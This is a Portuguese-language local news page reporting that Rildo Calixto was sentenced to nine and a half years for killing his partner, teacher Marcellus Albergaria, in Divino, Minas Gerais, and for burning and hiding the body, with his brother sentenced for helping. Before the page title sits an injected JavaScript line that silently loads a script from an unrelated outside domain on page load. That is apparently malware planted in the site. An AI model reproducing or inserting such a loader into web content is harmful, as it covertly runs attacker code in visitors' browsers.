;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Rapaz que matou namorado é condenado a 9 anos e meio. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Rapaz que matou namorado é condenado a 9 anos e meio.

O autor Rildo foi condenado a 9 anos e seis meses
O autor Rildo foi condenado a 9 anos e seis meses

DIVINO (MG) – O jovem Rildo Calixto foi condenado a nove anos e meio de prisão pelo assassinato e ocultação do cadáver de seu namorado, o professor Marcellus Albergaria, em Divino, no ano passado. O julgamento aconteceu nesta quarta-feira, 19/02.

O julgamento de Rildo se estendeu por mais de 12 horas e só terminou por volta das 8 da noite com as sentenças confirmadas pelo Tribunal do Júri.

Rildo foi condenado a oito anos de prisão pelo assassinato do professor Marcellus e mais um ano e meio por ter ocultado o corpo da vítima no cafezal, totalizando 9 anos e meio.

No mesmo julgamento foi condenado o irmão de Rildo, Vilmo Calixto que ajudou a esconder o corpo da vítima. Ele também recebeu a sentença de 18 meses, mas cumprirá em regime aberto.

O CASO

Depois de ocultar a verdade por algum tempo, Rildo confessou matado o professor Marcellus com quem dividia uma casa, em junho de 2013. Marcellus foi morto covardemente

Percebendo que não conseguiria carregar o corpo sozinho, Rildo chamou o irmão Vilmo. Os dois colocaram o corpo no porta-malas do carro e seguiram para um cafezal perto do córrego do Retiro (zona rural de Divino), onde Rildo ateou fogo ao corpo.

O autor também admitiu que dois dias depois retornou ao cafezal e recolheu os restos mortais que não haviam sido queimados, escondendo-os numa vegetação mais intensa, a cerca de dez metros do cafezal.

Fonte e fotos: Jornal O Campeão

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.